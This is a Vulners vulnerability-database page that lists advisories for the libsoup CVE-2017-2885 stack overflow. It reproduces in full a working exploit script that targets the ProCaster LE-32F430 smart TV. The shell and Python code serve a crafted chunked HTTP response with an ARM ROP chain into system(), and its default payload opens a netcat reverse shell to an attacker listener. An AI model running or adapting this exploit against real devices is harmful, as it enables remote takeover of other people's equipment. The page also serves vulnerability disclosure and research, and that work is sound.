Vulners
Lucene search
ProCaster LE-32F430 GStreamer souphttpsrc libsoup/2.51.3 Stack Overflow
| Reporter | Title | Published | Views | Family All 96 |
|---|---|---|---|---|
 | ProCaster LE-32F430 GStreamer souphttpsrc libsoup/2.51.3 Stack Overflow Exploit | 8 Dec 202000:00 | – | zdt |
 | Security Bulletin: A vulnerability in libsoup affects PowerKVM | 18 Jun 201801:38 | – | ibm |
 | libsoup -- stack based buffer overflow | 17 Aug 201700:00 | – | freebsd |
 | CVE-2017-2885 | 24 Apr 201819:00 | – | alpinelinux |
 | [ASA-201708-5] libsoup: arbitrary code execution | 10 Aug 201700:00 | – | archlinux |
 | CentOS 7 : libsoup (CESA-2017:2459) | 25 Aug 201700:00 | – | nessus |
| Debian DSA-3929-1 : libsoup2.4 - security update | 11 Aug 201700:00 | – | nessus |
| EulerOS 2.0 SP1 : libsoup (EulerOS-SA-2017-1209) | 11 Sep 201700:00 | – | nessus |
| EulerOS 2.0 SP2 : libsoup (EulerOS-SA-2017-1210) | 11 Sep 201700:00 | – | nessus |
| EulerOS Virtualization for ARM 64 3.0.1.0 : libsoup (EulerOS-SA-2019-1392) | 14 May 201900:00 | – | nessus |
10
`#!/bin/sh
# ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through
# GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885)
# ~ def <[email protected]> 2020-02-15 ................. 850day exploit lol
# Exploit payload: ret2libc system() nc reverse shell with a clean exit()
CMD="${CMD:-/bin/busybox nc ${IP:-192.168.1.100} ${PORT:-54321} -e /bin/sh}"
case "${1:-${ACTION:-httpd}}" in # By default, start socat-based exploit server
httpd)
# Check dependencies
for PROGRAM in socat python3 dd wc; do
if ! command -v "$PROGRAM" >/dev/null; then
printf "Missing dependency: %s\n" "$PROGRAM"
exit 1
fi
done
# Parse bind address and port
case "${ARG=${2:-${HTTPD_BIND:-0.0.0.0:12345}}}" in
*:*) HTTPD_ADDR="${ARG%:*}"; HTTPD_PORT="${ARG#*:}" ;;
*) printf "Bad httpd [IPv4:PORT] bind arg: %s\n" "$ARG"; exit 1 ;;
esac >&2
# Start socat HTTP server
printf "HTTP souploit.sh server @ %s:%d\n" "$HTTPD_ADDR" "$HTTPD_PORT"
printf "Exploit system() payload: %s\n" "$CMD"
exec socat -v -x \
TCP-LISTEN:"$HTTPD_PORT,reuseaddr,fork,bind=$HTTPD_ADDR" \
EXEC:"\\'$0\\' request"
;;
-h|--help|help) printf "Usage: %s httpd [IPv4:PORT]\n" "$0"; exit 0 ;;
request) set -e ;;
*) printf "Unsupported %s action: '%s'\n" "$0" "$1" >&2; exit 1 ;;
esac
# GStreamer souphttpsrc dislikes fragmented HTTP responses (so buffer them)
flush_stdout() {
exec 1>&3 3>&-
dd if=/tmp/$$.stdout bs="$(wc -c </tmp/$$.stdout)" count=1 2>/dev/null
rm -f /tmp/$$.stdout
}
exec 3>&1 1>/tmp/$$.stdout
trap flush_stdout EXIT
# Parse HTTP request
IFS="$(printf '\t\r\n ')"
TIME="$(date '+%Y-%m-%d %H:%M:%S%z')"
if read -r METHOD URL HTTP && [ -n "$METHOD" -a -n "$URL" -a -n "$HTTP" ]; then
printf "[%s] %s %s %s\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
while IFS="$IFS:" read -r KEY VALUE && [ -n "$KEY" -a -n "$VALUE" ]
do printf "[%s] %s: %s\n" "$TIME" "$KEY" "$VALUE"; done >&2
else
printf "[%s] '%s' '%s' '%s'\n" "$TIME" "$METHOD" "$URL" "$HTTP" >&2
printf "HTTP/1.1 400 Bad Request\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Length: 0\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
fi
# Handle HTTP HEAD and GET
if [ "$METHOD" = "HEAD" ]; then
printf "HTTP/1.1 200 OK\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Type: %s\r\n" "${MIME:-"video/mp4"}"
printf "Content-Length: %d\r\n" "12345"
printf "Accept-Ranges: bytes\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
elif [ "$METHOD" != "GET" ]; then
printf "HTTP/1.1 405 Not Allowed\r\n"
printf "Date: %s\r\n" "$(TZ=GMT date '+%a, %d %b %Y %T %Z')"
printf "Content-Length: 0\r\n"
printf "Connection: close\r\n"
printf "\r\n"
exit 0
fi
# Exploit payload
python3 -u - "$CMD" <<"EOF"
import sys, struct
command = sys.argv[1].encode() + b'\x00'
if len(command) > 108: raise Exception("Command length exceeds limit 108")
LE32, BE32 = lambda v: struct.pack('<I', v), lambda v: struct.pack('>I', v)
sys.stdout.buffer.write(b"".join([
#####################################
b"HTTP/1.1 206 OK\r\n", #
b"Transfer-Encoding: chunked\r\n", #
b"Connection: close\r\n", #
b"\r\n", #
#####################################
b"1\r\n", # start a chunk #
b">", # 4B alignment #
#####################################
LE32(0xAAAAAAAA), # padding #
LE32(0xBBBBBBBB), # padding #
LE32(0xCCCCCCCC), # padding #
#####################################
LE32(0x477B9C49), # (9) sym.exit
command.ljust(108), # system() command
LE32(0x4783A1E3), # (4) pc = add sp, 0x64; pop.w {r4, ..., r11, pc}
LE32(0x4784A7C7), # (7) r4 = ldr lr, [sp], 4; bx r3; bx lr
LE32(0x4783D287), # (2) r4 = mov r0, sp; blx r3
#####################################
BE32(0x01234567), # padding #
BE32(0x89ABCDEF), # padding #
#####################################
LE32(0x477C01E5), # (8) r8 = sym.system
LE32(0x477CF019), # (3) r8 = add sp, 0x6C; ldr pc, [sp], 4
LE32(0x478436F7), # (6) r10 = mov r3, r8; blx r4
LE32(0x478436F7), # (1) r10 = mov r3, r8; blx r4
LE32(0x477927A3), # (5) pc = sub sp, 0x98; bx r10
LE32(0x477927A3), # (0) pc = sub sp, 0x98; bx r10
#####################################
LE32(0x4787BB08), # valid pointer #
LE32(0x4787BB08), # valid pointer #
#####################################
b"\r\n" # payload EOF # 248B
#####################################
]))
EOF
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Dec 2020 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.03997